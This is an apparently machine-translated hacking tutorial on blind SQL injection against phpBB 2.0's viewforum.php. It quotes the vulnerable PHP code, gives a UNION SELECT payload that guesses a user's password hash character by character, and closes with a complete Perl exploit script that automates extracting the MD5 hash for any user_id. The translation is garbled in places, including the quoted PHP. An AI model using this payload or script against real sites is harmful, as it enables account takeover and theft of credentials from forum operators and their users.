PHP injection instance on the Internet it is difficult to see a complete article on the PHP injection and the use of code, so I have MySQL and PHP hard to chew for a few weeks, the following talk about my recess, I hope to give a chance!
I believe that the injection of ASP is already very familiar with, and PHP injection than ASP to be difficult, because the PHP magic_gpc option does make people headache, in the injection do not appear in quotes, and PHP is mostly combined with MySQL, and MySQL's functional shortcomings, From the other side of the point of view to prevent the attack of SQL Njection, I give an example here, I take phpbb2.0 as an example:
There is a variable in viewforum.php that is not filtered:
if (Isset ($HTTP _get_vars<post_forum_url]) ││isset ($HTTP _post_vars<post_forum_url]))
{
$forum _id = (isset ($HTTP _get_vars<post_forum_url))? Intval ($HTTP _get_vars<post_forum_url]): intval
($HTTP _post_vars<post_forum_url]);
}
else if (isset ($HTTP _get_vars[' Forum '))
{
$forum _id = $HTTP _get_vars[' forum ');
}
Else
{
$forum _id = ';
}
This is the forum, and the following directly put it into the query:
if (!empty ($forum _id))
{
$sql = "SELECT *
From ". Forums_table. "
WHERE forum_id = $forum _id ";
if (! ( $result = $db->sql_query ($sql)))
{
Message_die (General_error, ' Could not obtain forums information ', ', __line__, __file__, $sql);
}
}
Else
{
Message_die (general_message, ' forum_not_exist ');
}
If it is an ASP, I believe a lot of people will be injected. If the forum_id specified forum does not exist, it will make $result empty, and then return could not obtain forums information information, so the following code can not be executed down
//
If the query doesn ' t return any rows this isn ' t a valid forum. Inform
The user.
//
if (! ( $forum _row = $db->sql_fetchrow ($result)))
{
Message_die (general_message, ' forum_not_exist ');
}
//
Start Session Management
//
$userdata = Session_pagestart ($user _ip, $forum _id)/****************************************
The key is the line of asterisks, here is a function session_pagestart ($user _ip, $thispage _id), which is a function defined in session.php, because the code is too
Long, not all posted out, interested can self-see, the key is that the function also called Session_begin (), the function called the following session_begin ($user _id, $user _ip,
$thispage _id, TRUE), is also defined in this file, which has the following code
$sql = "UPDATE". Sessions_table. "
SET session_user_id = $user _id, session_start = $current _time, session_time = $current _time, session_page =
$page _id, session_logged_in = $login
WHERE session_id = ' ". $session _id. "'
and session_ip = ' $user _ip ' ";
if (! ( $result = $db->sql_query ($sql)) ││! $db->sql_affectedrows ())
{
$session _id = MD5 (uniqid ($user _ip));
$sql = "INSERT into". Sessions_table. "
(session_id, session_user_id, Session_Start, Session_time, Session_ip, Session_page,
SESSION_LOGGED_IN)
VALUES (' $session _id ', $user _id, $current _time, $current _time, ' $user _ip ', $page _id, $login) ";
if (! ( $result = $db->sql_query ($sql)))
{
Message_die (Critical_error, ' ERROR creating new Session:session_begin ', ', __line__, __file__,
$SQL);
}
Here's a session_page defined in MySQL is a number of plastic, his?? $page _id, that is, $forum_id, if the insertion is not shaping will be error, will appear error
Creating new Session:session_begin, so it's important to refer to this $forum_id value, so I'll specify it as: -1%20union%20select% 201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%20user_id=2%20and%20ord (SUBSTRING ( user_password,1,1) = 57, no quotes! Although the specified is a non-existent forum_id but he returned the results of the query may not be empty, this is to guess user_id is 2 of the user's first password ASCII value is 57, If so, the first paragraph of the article in the code of $result is not empty, and then executed the Ession_pagestart this problematic function, inserted is not an integer of course, will be wrong, so the error is displayed creating new Session:session _begin, that means you guessed the right first, the other bits are similar.
If there is no such error message, I think even if the injection of success is difficult to determine whether it has been successful, it seems that the error message is also helpful AH. Analysis is here, the following is attached to a test code, this code as long as a little modification can be applied to other similar guess MD5 password, here I use the English version of the return condition, In Chinese and other languages just change the return criteria.
Use Http::request::common;
Use Http::response;
Use lwp::useragent;
$ua = new Lwp::useragent;
print "***********************n";
Print "phpBB viewforum.php expn";
Print "Code by PINKEYESN";
print "Www.icehack.comn";
print "************************n";
Print "Please enter the weak file ' s url:n";
print "e.g. HTTP://192.168.1.4/PHPBB2/VIEWFORUM.PHPN";
$adr =<stdin>;
Chomp ($ADR);
Print "Please enter the user_id-want to Crackn";
$u =<stdin>;
Chomp ($u);
Print "Work Starting,please wait!n";
@pink = (48..57);
@pink = (@pink, 97..102);
for ($j =1; $j <=32; $j + +) {
for ($i =0; $i < @pink; $i + +) {
$url = $adr. "? Forum=-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%
20user_id= $u%20and%20ord (substring (User_password, $j, 1)) = $pink [$i] ";
$request = http::request->new (' GET ', ' $url ');
$response = $ua->request ($request);
if ($response->is_success) {
if ($response->content =~/error Creating new session/) {
$pwd. =CHR ($pink [$i]);
print "$PWDN";
}
}
}
}
if ($pwd ne "") {
Print "Successfully,the password is $pwd, good luckn";}
else{
Print "Bad Luck,work failed!n";}
As for the recent phpbb2.0.6 of search.php, the use of the program is just a slight modification of the code.
